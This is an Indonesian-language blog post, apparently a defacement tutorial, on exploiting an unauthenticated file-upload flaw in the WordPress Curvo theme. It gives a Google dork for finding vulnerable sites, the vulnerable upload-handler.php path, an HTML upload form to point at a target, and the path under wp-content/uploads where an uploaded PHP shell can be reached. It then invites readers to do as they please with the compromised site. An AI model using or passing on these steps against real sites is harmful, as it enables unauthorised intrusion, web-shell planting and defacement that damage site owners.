» » » WordPress Curvo Themes CSRF File Upload Vulnerability
, Edit

WordPress Curvo Themes CSRF File Upload Vulnerability

Selamat pagi,siang,sore,malam para maho :)
yang baca ini pasti maho :)
sekarang saya posting cara deface dengan Metode Curvo Themes atau WordPress Curvo Themes CSRF File Upload Vulnerability
sumber http://www.exploit-db.com/exploits/29211/
Author: Byakuya

oke pertama kita masukan dork ke google
inurl:/themes/curvo/
kalo bisa kembangin lagi biar banyak site yang vuln nya.

terus cari salah 1 target
dan masukan exploit ini [path]/wp-content/themes/curvo/functions/upload-handler.php
contoh (hanya contoh saja) :
http://www.target-ewe.com/wp/wp-content/themes/curvo/functions/upload-handler.php
kalau sudah masukan exploit nya terus ada tulisan error di site nya berarti kemungkinan site nya vuln, tapi kalo tulisan Not Acceptable! sudah pasti tidak vuln !
gambar website yang kemungkinan vuln



 

nah kalau ada tulisan error kaya gambar di atas berarti kemungkin bakalan vuln :D
terus buat file html ini

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form> 

buat dengan extensi .html
lalu masukan website yang agan dapatkan tadi di script html di atas
ganti ini
http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php ganti dengan target agan..


 
setelah itu buka file html agan tadi
seperti contoh di bawah





















kalau sudah seperti gambar di atas lalu upload shell agan
kalau site nya vuln bakal keluar tulisan nama shell yang agan upload
seperti gambar di bawah ini




















nah gambar di atas menandakan website nya vuln :D
sekarang kita buka shell yang kita upload disini
http://target-agan.com/[path]/wp-content/uploads/[tahun]/[bulan]/shell.php
tahun : tahun bisa saja di tuliskan 14 atau bisa saja 2014
bulan : kalau bulan di tuliskan 2 digit.. ex:01,02,03,04,05 dan seterus nya :D

lihat gambar di bawah


















nah kita sudah masuk ke shell kita :D
setelah itu terserah agan mau di gimana in juga , asal jangan tebas index.php nya :) , kalau mau tebas index.php nya biasakan backup dulu index.php sebelum nya :)
karena membuat website itu tidak mudah , tapi merusak nya mudah :v

kalau mau copas sertakan sumbernya :)
dan jangan hapus nama Author nya , bug ini di temukan sama Byakuya :)

#Synchronizer 

0 Response to "WordPress Curvo Themes CSRF File Upload Vulnerability"

Posting Komentar

Langganan: Posting Komentar (Atom)